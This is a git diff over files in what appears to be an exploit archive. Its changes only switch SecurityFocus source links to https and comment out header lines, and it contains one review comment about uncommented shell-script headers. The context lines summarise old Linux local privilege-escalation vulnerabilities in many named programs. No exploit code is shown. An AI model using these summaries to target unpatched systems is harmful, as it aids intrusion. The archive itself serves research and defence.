a/exploits/linux/local/22813.c +++ b/exploits/linux/local/22813.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/8002/info +source: https://www.securityfocus.com/bid/8002/info A potential information disclosure vulnerability has been reported for the Linux /proc filesystem, specifically when invoking setuid applications. As a result, an unprivileged user may be able to read the contents of a setuid application's environment data. This could potentially, although unlikely, result in the disclosure of sensitive information, such as restricted file path information. */ 
diff --git a/exploits/linux/local/22815.c b/exploits/linux/local/22815.c index fd7fb9c71..850df5f96 100644 --- a/exploits/linux/local/22815.c +++ b/exploits/linux/local/22815.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8005/info +// source: https://www.securityfocus.com/bid/8005/info It has been reported that GNATS is prone to a buffer overflow condition when parsing certain environment variables. diff --git a/exploits/linux/local/22836.pl b/exploits/linux/local/22836.pl index 1714d3093..98257f82d 100755 --- a/exploits/linux/local/22836.pl +++ b/exploits/linux/local/22836.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8030/info +source: https://www.securityfocus.com/bid/8030/info A buffer overrun has been discovered in Elm. The problem occurs due to insufficient bounds checking performed before copying user-supplied data into an internal memory buffer. Specifically, a TERM environment variable containing excessive data would cause a buffer within Elm to be overrun. diff --git a/exploits/linux/local/22840.c b/exploits/linux/local/22840.c index aea2ffd17..d095e1def 100644 --- a/exploits/linux/local/22840.c +++ b/exploits/linux/local/22840.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/8042/info +source: https://www.securityfocus.com/bid/8042/info A race condition vulnerability has been discovered in the Linux execve() system call, affecting the 2.4 kernel tree. The problem lies in the atomicity of placing a target executables file descriptor within the current process descriptor and executing the file. diff --git a/exploits/linux/local/22847.txt b/exploits/linux/local/22847.txt index 089aab4ef..ff5cfd432 100644 --- a/exploits/linux/local/22847.txt +++ b/exploits/linux/local/22847.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8070/info +source: https://www.securityfocus.com/bid/8070/info It has been reported that the permissions set by default on the files and directories comprising InterSystems Cache are insecure. The permissions on directories allegedly allow for any user to overwrite any file. This creates many opportunities for local attackers to obtain root privileges. diff --git a/exploits/linux/local/22860.c b/exploits/linux/local/22860.c index d46a3924e..9d9be3ca9 100644 --- a/exploits/linux/local/22860.c +++ b/exploits/linux/local/22860.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8097/info +// source: https://www.securityfocus.com/bid/8097/info A local buffer overflow has been reported for GNU Chess that may result in an attacker obtaining elevated privileges. diff --git a/exploits/linux/local/22861.c b/exploits/linux/local/22861.c index 8b7b225db..9676ada06 100644 --- a/exploits/linux/local/22861.c +++ b/exploits/linux/local/22861.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8099/info +// source: https://www.securityfocus.com/bid/8099/info A local buffer overflow has been reported for GNU an that may result in an attacker potentially obtaining elevated privileges. diff --git a/exploits/linux/local/22862.c b/exploits/linux/local/22862.c index 37d94337a..2d9c85266 100644 --- a/exploits/linux/local/22862.c +++ b/exploits/linux/local/22862.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8100/info +// source: https://www.securityfocus.com/bid/8100/info isdnrep has been reported prone to a local command line argument buffer overflow vulnerability. diff --git a/exploits/linux/local/22863.c b/exploits/linux/local/22863.c index 8d9ae824c..1e3a9c594 100644 --- a/exploits/linux/local/22863.c +++ b/exploits/linux/local/22863.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8100/info +// source: https://www.securityfocus.com/bid/8100/info isdnrep has been reported prone to a local command line argument buffer overflow vulnerability. diff --git a/exploits/linux/local/22884.c b/exploits/linux/local/22884.c index 67459e105..4bd30a46a 100644 --- a/exploits/linux/local/22884.c +++ b/exploits/linux/local/22884.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8132/info +// source: https://www.securityfocus.com/bid/8132/info A problem with the software may make elevation of privileges possible. diff --git a/exploits/linux/local/22943.c b/exploits/linux/local/22943.c index eb5a80c4e..5283fce36 100644 --- a/exploits/linux/local/22943.c +++ b/exploits/linux/local/22943.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8239/info +// source: https://www.securityfocus.com/bid/8239/info A buffer overflow condition has been reported in top when handling environment variables of excessive length. This may result in an attacker potentially executing arbitrary code. diff --git a/exploits/linux/local/22965.c b/exploits/linux/local/22965.c index 05260fc4e..8721ef580 100644 --- a/exploits/linux/local/22965.c +++ b/exploits/linux/local/22965.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8296/info +// source: https://www.securityfocus.com/bid/8296/info XBlast is contains a locally exploitable buffer overflow vulnerability due to insufficient bounds checking of data supplied via the HOME environment variable. Successful exploitation would allow a local user to execute code with a gid of games. diff --git a/exploits/linux/local/22971.txt b/exploits/linux/local/22971.txt index d6fa0d60d..5fdc843e4 100644 --- a/exploits/linux/local/22971.txt +++ b/exploits/linux/local/22971.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8303/info +source: https://www.securityfocus.com/bid/8303/info The mandb utility has been reported to be affected by multiple local buffer overflow vulnerabilities. diff --git a/exploits/linux/local/22979.txt b/exploits/linux/local/22979.txt index f08dbded0..1eb66add7 100644 --- a/exploits/linux/local/22979.txt +++ b/exploits/linux/local/22979.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8328/info +source: https://www.securityfocus.com/bid/8328/info It has been reported that the rscsi utility may provide for the modification of ownership and the corruption of arbitrary attacker specified files. diff --git a/exploits/linux/local/22984.c b/exploits/linux/local/22984.c index 8ce5509b0..f5517b8a9 100644 --- a/exploits/linux/local/22984.c +++ b/exploits/linux/local/22984.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8337/info +// source: https://www.securityfocus.com/bid/8337/info xtokkaetama is prone to a locally exploitable buffer overflow vulnerability. This is due to insufficient bounds checking of the '-nickname' command line option, which could result in execution of arbitrary code in the context of the software. @@ -8,7 +8,7 @@ The software is typically installed setgid 'games'. by: v9[v9@fakehalo.deadpig.org]. (fakehalo) exploits an overflow missed in the patch/upgrade of: - http://www.securityfocus.com/bid/8312 + https://www.securityfocus.com/bid/8312 fix: xtama_score.c:132: +strncpy(name,nickname,sizeof(name)-1); diff --git a/exploits/linux/local/22985.c b/exploits/linux/local/22985.c index 9dbbcbec9..2a851e795 100644 --- a/exploits/linux/local/22985.c +++ b/exploits/linux/local/22985.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8337/info +// source: https://www.securityfocus.com/bid/8337/info xtokkaetama is prone to a locally exploitable buffer overflow vulnerability. This is due to insufficient bounds checking of the '-nickname' command line option, which could result in execution of arbitrary code in the context of the software. diff --git a/exploits/linux/local/22993.txt b/exploits/linux/local/22993.txt index 548e70af7..8cb05c5c1 100644 --- a/exploits/linux/local/22993.txt +++ b/exploits/linux/local/22993.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8365/info +source: https://www.securityfocus.com/bid/8365/info It has been reported that helper applications that are shipped with IPNetSentryX and IPNetMonitorX may be harnessed by a local attacker to provide for unauthorized network reconnaissance. diff --git a/exploits/linux/local/22996.c b/exploits/linux/local/22996.c index ca4d5b9d1..ac4d3669a 100644 --- a/exploits/linux/local/22996.c +++ b/exploits/linux/local/22996.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8370/info +// source: https://www.securityfocus.com/bid/8370/info A problem in the handling of long strings in environment variables by xpcd may result in a buffer overflow condition. This may allow an attacker to gain unauthorized access to system resources. diff --git a/exploits/linux/local/23045.pl b/exploits/linux/local/23045.pl index 85041671c..735707dbd 100755 --- a/exploits/linux/local/23045.pl +++ b/exploits/linux/local/23045.pl 
@@ -1,4 +1,4 @@ -#source: http://www.securityfocus.com/bid/8462/info +#source: https://www.securityfocus.com/bid/8462/info # #Various potential security vulnerabilities have been reported for ViRobot Linux Server. Problems are said to occur within various setuid binaries installed by the program. Reports indicate that some of these binaries may be prone to buffer overruns, potentially making them exploitable to execute arbitrary code with elevated privileges. diff --git a/exploits/linux/local/23119.c b/exploits/linux/local/23119.c index 2133c7c9f..34e27b847 100644 --- a/exploits/linux/local/23119.c +++ b/exploits/linux/local/23119.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8561/info +// source: https://www.securityfocus.com/bid/8561/info It has been discovered that Apache::Gallery, when using Inline C, stores shared libraries in an insecure fashion. As a result, an attacker may be capable of having malicious code linked into the Apache process. This could lead to a malicious local user gaining the privileges of the user invoking the Apache process, typically user nobody. It should be noted that for a successful exploitation, the libraries must be replaced prior to the Apache process being invoked. diff --git a/exploits/linux/local/23126.c b/exploits/linux/local/23126.c index 4ac4beef5..61fbb0a53 100644 --- a/exploits/linux/local/23126.c +++ b/exploits/linux/local/23126.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8571/info +// source: https://www.securityfocus.com/bid/8571/info The configuration files for the RealOne Player are installed in the a hidden folder in a users home directory. The issue presents itself, because configuration files stored in this directory are installed with insecure permissions. This means that an attacker, who is in the same group as a target user, may modify RealOne Player configuration files and may thereby escalate privileges to that of the target user. 
diff --git a/exploits/linux/local/23168.pl b/exploits/linux/local/23168.pl index cfa092e8b..5ca9aa200 100755 --- a/exploits/linux/local/23168.pl +++ b/exploits/linux/local/23168.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8675/info +source: https://www.securityfocus.com/bid/8675/info A vulnerability has been reported in man that may allow an attacker to gain elevated privileges. The problem lies in man failing to carry out sufficient sanity checks before executing a user-defined compression program. As a result, it may be possible for an attacker to execute arbitrary code with user 'man' privileges. diff --git a/exploits/linux/local/23189.c b/exploits/linux/local/23189.c index df8868515..d34c99a1e 100644 --- a/exploits/linux/local/23189.c +++ b/exploits/linux/local/23189.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8710/info +// source: https://www.securityfocus.com/bid/8710/info A problem in the handling of data in the Home environment variable has been reported in the marbles program. This may make it possible for a local attacker to gain elevated privileges. diff --git a/exploits/linux/local/23197.c b/exploits/linux/local/23197.c index c8ddf881c..c4c0347e8 100644 --- a/exploits/linux/local/23197.c +++ b/exploits/linux/local/23197.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8729/info +// source: https://www.securityfocus.com/bid/8729/info A problem in the handling of large requests supplied with certain flags has been reported in Maj-Jong. Because of this, it may be possible for a local attacker to gain elevated privileges. diff --git a/exploits/linux/local/23204.c b/exploits/linux/local/23204.c index 7d654f766..136be4dca 100644 --- a/exploits/linux/local/23204.c +++ b/exploits/linux/local/23204.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8736/info +// source: https://www.securityfocus.com/bid/8736/info A local buffer overrun vulnerability has been reported for Silly Poker. The problem occurs due to insufficient bounds checking when handling user-supplied data. As a result, an attacker may be capable of controlling the execution flow of the sillypoker program and effectivley executing arbitrary code with elevated privileges. diff --git a/exploits/linux/local/23223.c b/exploits/linux/local/23223.c index 1b2e03e40..3456202d9 100644 --- a/exploits/linux/local/23223.c +++ b/exploits/linux/local/23223.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8778/info +// source: https://www.securityfocus.com/bid/8778/info A problem exists in the SuSEWM configuration file used by SuSEConfig. Because of this, it may be possible for a local attacker to gain elevated privileges. diff --git a/exploits/linux/local/23228.c b/exploits/linux/local/23228.c index d72640e78..51709dfb1 100644 --- a/exploits/linux/local/23228.c +++ b/exploits/linux/local/23228.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8780/info +// source: https://www.securityfocus.com/bid/8780/info It has been reported that a local off-by-one heap overflow exists in the handling of user-supplied databases by slocate. Because of this, an attacker may be able to gain elevated privileges. diff --git a/exploits/linux/local/23258.c b/exploits/linux/local/23258.c index 784df7c6e..43a7320f1 100644 --- a/exploits/linux/local/23258.c +++ b/exploits/linux/local/23258.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8844/info +// source: https://www.securityfocus.com/bid/8844/info Oracle Database Server 'oracle' binary has been reported prone to a local buffer overflow vulnerability. diff --git a/exploits/linux/local/23297.c b/exploits/linux/local/23297.c index c0ca2985c..1875c3197 100644 --- a/exploits/linux/local/23297.c +++ b/exploits/linux/local/23297.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8899/info +// source: https://www.securityfocus.com/bid/8899/info A vulnerability has been reported for Musicqueue. The problem specifically occurs within a signal handling procedure used invoked when a segmentation violation occurs. The procedure invokes a library function, passing it the name of a predictable filename to create within the systems temporary directory. As a result, an attacker may be capable of launching a symbolic link attack, effectively overwriting the contents of a potentially system critical file with the contents of the created file. diff --git a/exploits/linux/local/23299.c b/exploits/linux/local/23299.c index fccc7259f..b4054a8b5 100644 --- a/exploits/linux/local/23299.c +++ b/exploits/linux/local/23299.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8901/info +// source: https://www.securityfocus.com/bid/8901/info A problem has been identified in the iwconfig program when handling strings on the commandline. Because of this, a local attacker may be able to gain elevated privileges. diff --git a/exploits/linux/local/23300.c b/exploits/linux/local/23300.c index 54410c188..6711a0871 100644 --- a/exploits/linux/local/23300.c +++ b/exploits/linux/local/23300.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8901/info +// source: https://www.securityfocus.com/bid/8901/info A problem has been identified in the iwconfig program when handling strings on the commandline. Because of this, a local attacker may be able to gain elevated privileges. diff --git a/exploits/linux/local/23301.c b/exploits/linux/local/23301.c index 2a28b22b1..52934c599 100644 --- a/exploits/linux/local/23301.c +++ b/exploits/linux/local/23301.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8901/info +// source: https://www.securityfocus.com/bid/8901/info A problem has been identified in the iwconfig program when handling strings on the commandline. Because of this, a local attacker may be able to gain elevated privileges. diff --git a/exploits/linux/local/23303.c b/exploits/linux/local/23303.c index 8d44e7426..89c929c87 100644 --- a/exploits/linux/local/23303.c +++ b/exploits/linux/local/23303.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8903/info +// source: https://www.securityfocus.com/bid/8903/info Multiple buffer overrun vulnerabilities have been discovered in Musicqueue. Both issues stem from the lack of bounds checking when passing user-supplied input to the sprintf() libc function. As a result, it may be possible for an attacker to exploit arbitrary code with the privileges the affected application, possibly installed suid or sgid. diff --git a/exploits/linux/local/23308.c b/exploits/linux/local/23308.c index 50f46de90..fabf5f281 100644 --- a/exploits/linux/local/23308.c +++ b/exploits/linux/local/23308.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8915/info +// source: https://www.securityfocus.com/bid/8915/info It has been alleged that it is possible for local attackers to gain root privileges through kpopup, which is is installed setuid root by default. According to the report, kpopup uses the system(3) C-library function insecurely to run other utilities on the system. In at least one instance, system(3) is called to invoke the binary killall(1) in a manner relying on the PATH environment variable. As the environment can be set by the unprivileged user when kpopup is executed, an arbitrary executable with the filename killall(1) can be executed. Many modern shells anticipate insecure use of this function by setuid/setgid processes and drop effective privileges if they do not match the real userid/gid of the process. It may be the case that kpopup first sets its real uid and gid to 0 before calling system, making this vulnerability exploitable. This has not been confirmed by Symantec. diff --git a/exploits/linux/local/23344.txt b/exploits/linux/local/23344.txt index 7f871bd37..d97d7aa93 100644 --- a/exploits/linux/local/23344.txt +++ b/exploits/linux/local/23344.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8989/info +source: https://www.securityfocus.com/bid/8989/info Multiple command-line parameter format string vulnerabilities have been discovered in various IBM DB2 binaries. Specifically, format-based functions are implemented erroneously within the db2govd, db2start, and db2stop programs. These binaries are typically installed setuid. As a result, a malicious local user may be capable of gaining elevate privileges. diff --git a/exploits/linux/local/23345.txt b/exploits/linux/local/23345.txt index 2d67ad871..861f02414 100644 --- a/exploits/linux/local/23345.txt +++ b/exploits/linux/local/23345.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8989/info +source: https://www.securityfocus.com/bid/8989/info Multiple command-line parameter format string vulnerabilities have been discovered in various IBM DB2 binaries. Specifically, format-based functions are implemented erroneously within the db2govd, db2start, and db2stop programs. These binaries are typically installed setuid. As a result, a malicious local user may be capable of gaining elevate privileges. diff --git a/exploits/linux/local/23346.txt b/exploits/linux/local/23346.txt index b802b685d..4e1fdaf66 100644 --- a/exploits/linux/local/23346.txt +++ b/exploits/linux/local/23346.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8989/info +source: https://www.securityfocus.com/bid/8989/info Multiple command-line parameter format string vulnerabilities have been discovered in various IBM DB2 binaries. Specifically, format-based functions are implemented erroneously within the db2govd, db2start, and db2stop programs. These binaries are typically installed setuid. As a result, a malicious local user may be capable of gaining elevate privileges. diff --git a/exploits/linux/local/23350.c b/exploits/linux/local/23350.c index e89c42015..065a370c3 100644 --- a/exploits/linux/local/23350.c +++ b/exploits/linux/local/23350.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8993/info +// source: https://www.securityfocus.com/bid/8993/info It has been reported that TerminatorX may be prone to multiple vulnerabilities when handling command-line and environment variable data. As a result, an attacker may be capable of exploiting the application in a variety of ways to execute arbitrary code with elevated privileges. It should be noted that TerminatorX is not installed setuid by default, however the author recommends that users make the application setuid root. diff --git a/exploits/linux/local/23351.c b/exploits/linux/local/23351.c index 84e09c702..1c78e2214 100644 
--- a/exploits/linux/local/23351.c +++ b/exploits/linux/local/23351.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8993/info +// source: https://www.securityfocus.com/bid/8993/info It has been reported that TerminatorX may be prone to multiple vulnerabilities when handling command-line and environment variable data. As a result, an attacker may be capable of exploiting the application in a variety of ways to execute arbitrary code with elevated privileges. It should be noted that TerminatorX is not installed setuid by default, however the author recommends that users make the application setuid root. diff --git a/exploits/linux/local/23352.c b/exploits/linux/local/23352.c index 5bc117f36..c3ec71964 100644 --- a/exploits/linux/local/23352.c +++ b/exploits/linux/local/23352.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8993/info +// source: https://www.securityfocus.com/bid/8993/info It has been reported that TerminatorX may be prone to multiple vulnerabilities when handling command-line and environment variable data. As a result, an attacker may be capable of exploiting the application in a variety of ways to execute arbitrary code with elevated privileges. It should be noted that TerminatorX is not installed setuid by default, however the author recommends that users make the application setuid root. diff --git a/exploits/linux/local/23364.sh b/exploits/linux/local/23364.sh index 30b149f1a..34c7263d9 100755 --- a/exploits/linux/local/23364.sh +++ b/exploits/linux/local/23364.sh 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8995/info +source: https://www.securityfocus.com/bid/8995/info wmapm has been reported prone to a local privilege escalation vulnerability. The vulnerability has been conjectured to result from a lack of relative path usage while the vulnerable dock app is invoking a third party binary. As a result of this, a local attacker may manipulate local path settings and have the setuid wmapm dock app erroneously invoke a trojan binary that is located in a directory that the attacker has permissions to write to. diff --git a/exploits/linux/local/23414.txt b/exploits/linux/local/23414.txt index ae508917d..17e5743cf 100644 --- a/exploits/linux/local/23414.txt +++ b/exploits/linux/local/23414.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9161/info +source: https://www.securityfocus.com/bid/9161/info It has been reported that FVWM may be prone to a command execution vulnerability that may allow an attacker to execute malicious commands on a vulnerable system. It has been reported that the fvwm-menu-directory component does not properly sanitize user input and allows a user with write permissions to a directory to execute arbitrary commands. diff --git a/exploits/linux/local/23479.sh b/exploits/linux/local/23479.sh index dffc6de25..af05bae70 100755 --- a/exploits/linux/local/23479.sh +++ b/exploits/linux/local/23479.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9297/info +source: https://www.securityfocus.com/bid/9297/info It has been reported that GNU Indent may be prone to a local heap overflow vulnerability that can be exploited through a malicious C source input file. It has been reported that indent copies data from the file to a 1000 byte long buffer without sufficient boundary checking. A heap overflow condition can be triggered, which may result in memory being overwritten and, ultimately, malicious code execution with the privileges of the user running indent. 
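Review bot: In the 23479.sh hunk the header is left uncommented. The file is mode 100755, yet line 1 stays `source: https://...` and the description below it is bare prose, so a shell would try to run both as commands. The .c files in this patch gain a `// source:` prefix and 23045.pl already carries `#source:`; give the shell scripts the same treatment with a `# ` prefix on every header line (23364.sh, earlier on this line, has the same header).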
diff --git a/exploits/linux/local/23481.c b/exploits/linux/local/23481.c index d21ba099a..336738a80 100644 --- a/exploits/linux/local/23481.c +++ b/exploits/linux/local/23481.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9302/info +// source: https://www.securityfocus.com/bid/9302/info Reportedly, the Apache mod_php module may be prone to a vulnerability that may allow a local attacker to gain access to privileged file descriptors. As a result, the attacker may pose as a legitimate server and possibly steal or manipulate sensitive information. diff --git a/exploits/linux/local/23482.c b/exploits/linux/local/23482.c index 89ec2adfe..a5e31d736 100644 --- a/exploits/linux/local/23482.c +++ b/exploits/linux/local/23482.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9302/info +// source: https://www.securityfocus.com/bid/9302/info Reportedly, the Apache mod_php module may be prone to a vulnerability that may allow a local attacker to gain access to privileged file descriptors. As a result, the attacker may pose as a legitimate server and possibly steal or manipulate sensitive information. diff --git a/exploits/linux/local/23510.c b/exploits/linux/local/23510.c index 9c78b17e7..f35dd855d 100644 --- a/exploits/linux/local/23510.c +++ b/exploits/linux/local/23510.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9341/info +// source: https://www.securityfocus.com/bid/9341/info xsok is prone to a locally exploitable buffer overrun vulnerability due to insufficient bounds check of data supplied through the LANG environment variable. This could be exploited to execute arbitrary code with elevated privileges. The program is typically installed setgid games. diff --git a/exploits/linux/local/23581.pl b/exploits/linux/local/23581.pl index b9fa1950e..7c214be01 100755 --- a/exploits/linux/local/23581.pl +++ b/exploits/linux/local/23581.pl 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9471/info +source: https://www.securityfocus.com/bid/9471/info A vulnerability has been reported to exist in the Apache mod_perl module that may allow local attackers to gain access to privileged file descriptors. This issue could be exploited by an attacker to hijack a vulnerable server daemon. Other attacks are also possible. diff --git a/exploits/linux/local/23634.c b/exploits/linux/local/23634.c index 92c3f1942..ca9a7833b 100644 --- a/exploits/linux/local/23634.c +++ b/exploits/linux/local/23634.c @@ -1,4 +1,4 @@ -// source: http://www.securityfocus.com/bid/9550/info +// source: https://www.securityfocus.com/bid/9550/info // The 0verkill game client has been reported prone to multiple instances of exploitable buffer overrun vulnerabilities. The functions that have been reported to be affected are load_cfg(), save_cfg() and send_message(). It has been reported that due to a lack of sufficient boundary checks performed on user supplied data, an attacker may exploit the issues to execute arbitrary instructions in the security context of the Overkill game client. diff --git a/exploits/linux/local/23658.c b/exploits/linux/local/23658.c index 05fa81097..f602f741e 100644 --- a/exploits/linux/local/23658.c +++ b/exploits/linux/local/23658.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/9596/info +source: https://www.securityfocus.com/bid/9596/info VServer is reported prone to a breakout vulnerability that allows a malicious user to escape from the context of the chrooted root directory of the virtual server. This issue is due to the VServer application failing to secure itself against a "chroot-again" style vulnerability. Successful exploitation of this issue may allow an attacker to gain access to the filesystem outside of the chrooted root directory. */ diff --git a/exploits/linux/local/23674.txt b/exploits/linux/local/23674.txt index 99633fe1e..29eb4a5c4 100644 
--- a/exploits/linux/local/23674.txt +++ b/exploits/linux/local/23674.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9619/info +source: https://www.securityfocus.com/bid/9619/info A local privilege escalation vulnerability has been reported to affect the 2.6 Linux kernel. diff --git a/exploits/linux/local/23682.c b/exploits/linux/local/23682.c index b6ab84854..ca9372d9f 100644 --- a/exploits/linux/local/23682.c +++ b/exploits/linux/local/23682.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9636/info +// source: https://www.securityfocus.com/bid/9636/info It has been reported that the XFree86 X Windows system is prone to a local buffer overflow vulnerability. The issue arises from improper bounds checking when parsing the 'font.alias' file. Successful exploitation of this issue may allow an attacker to gain root privileges to the affected system. diff --git a/exploits/linux/local/23738.c b/exploits/linux/local/23738.c index 1b12d1244..d48d29f3a 100644 --- a/exploits/linux/local/23738.c +++ b/exploits/linux/local/23738.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/9712/info +source: https://www.securityfocus.com/bid/9712/info Multiple buffer overflow vulnerabilities exist in the environment variable handling of LBreakout2. The issue is due to an insufficient boundary checking of certain environment variables used by the affected application. diff --git a/exploits/linux/local/23743.txt b/exploits/linux/local/23743.txt index ffee0a60f..f55b42222 100644 --- a/exploits/linux/local/23743.txt +++ b/exploits/linux/local/23743.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9724/info +source: https://www.securityfocus.com/bid/9724/info Load Sharing Facility eauth component has been reported prone to privilege escalation vulnerability. The eauth component is responsible for controlling authentication procedures within Load Sharing Facility. An issue has been reported where an attacker may send commands to Load Sharing Facility as any user. The issue presents itself because eauth uses an environment variable to determine the UID of the user invoking the binary. diff --git a/exploits/linux/local/23759.pl b/exploits/linux/local/23759.pl index 2be200e84..950d4cc67 100755 --- a/exploits/linux/local/23759.pl +++ b/exploits/linux/local/23759.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9746/info +source: https://www.securityfocus.com/bid/9746/info It has been reported that mformat is prone to a privilege escalation vulnerability when installed as a setUID application. This issue is due to a design error allowing a user to create any arbitrary files as the root user. diff --git a/exploits/linux/local/23849.txt b/exploits/linux/local/23849.txt index b1e9627b4..dd0dec0b6 100644 --- a/exploits/linux/local/23849.txt +++ b/exploits/linux/local/23849.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9922/info +source: https://www.securityfocus.com/bid/9922/info It has been reported that the FVWM fvwm_make_browse_menu.sh script is prone to a command execution vulnerability. This issue is due to the script allowing a user to define which application should be used to execute the file via its filename. diff --git a/exploits/linux/local/23882.pas b/exploits/linux/local/23882.pas index 7ead47546..bdb19c9e9 100644 --- a/exploits/linux/local/23882.pas +++ b/exploits/linux/local/23882.pas 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9981/info +source: https://www.securityfocus.com/bid/9981/info NetSupport School is prone to a password-encryption vulnerability because the application fails to protect passwords with a sufficiently effective encryption scheme. diff --git a/exploits/linux/local/23892.c b/exploits/linux/local/23892.c index 291a090ff..3c9d35d38 100644 --- a/exploits/linux/local/23892.c +++ b/exploits/linux/local/23892.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9998/info +// source: https://www.securityfocus.com/bid/9998/info Systrace has been reported prone to a vulnerability that may permit an application to completely bypass a Systrace policy. The issue presents itself because Systrace does not perform sufficient sanity checks while handling a process that is being traced with ptrace. diff --git a/exploits/linux/local/24027.txt b/exploits/linux/local/24027.txt index 7a6de14df..c74ca31b5 100644 --- a/exploits/linux/local/24027.txt +++ b/exploits/linux/local/24027.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10178/info +source: https://www.securityfocus.com/bid/10178/info It has been reported that utempter is affected by multiple local vulnerabilities. The first issue is due to an input validation error that causes the application to exit improperly; facilitating symbolic link attacks. The second issue is due to a failure of the application to properly validate buffer boundaries. diff --git a/exploits/linux/local/24043.c b/exploits/linux/local/24043.c index 90d1f192e..29093de0a 100644 --- a/exploits/linux/local/24043.c +++ b/exploits/linux/local/24043.c 
@@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/10201/info +source: https://www.securityfocus.com/bid/10201/info A local integer handling vulnerability has been announced in the Linux kernel. It is reported that this vulnerability may be exploited by an unprivileged local user to obtain kernel memory contents. Additionally it is reported that a root user may exploit this issue to write to arbitrary regions of kernel memory, which may be a vulnerability in non-standard security enhanced systems where uid 0 does not have this privilege. diff --git a/exploits/linux/local/24123.sh b/exploits/linux/local/24123.sh index 0d5037a7a..9d9e44a40 100755 --- a/exploits/linux/local/24123.sh +++ b/exploits/linux/local/24123.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10361/info +source: https://www.securityfocus.com/bid/10361/info The 'wget' utility has been reported prone to a race-condition vulnerability. The issue exists because wget doesn't lock files that it creates and writes to during file downloads. diff --git a/exploits/linux/local/24141.txt b/exploits/linux/local/24141.txt index ae9c61b00..168d84828 100644 --- a/exploits/linux/local/24141.txt +++ b/exploits/linux/local/24141.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10407/info +source: https://www.securityfocus.com/bid/10407/info cPanel is reported prone to a privilege escalation vulnerability. It is reported that the options used by cPanel to compile Apache 1.3.29 and PHP using the mod_phpsuexec option are insecure. These settings will reportedly permit a local attacker to execute arbitrary code as any user who possesses a PHP file that is published to the Apache web server. diff --git a/exploits/linux/local/24182.c b/exploits/linux/local/24182.c index 8754a2aed..99ef49deb 100644 --- a/exploits/linux/local/24182.c +++ b/exploits/linux/local/24182.c 
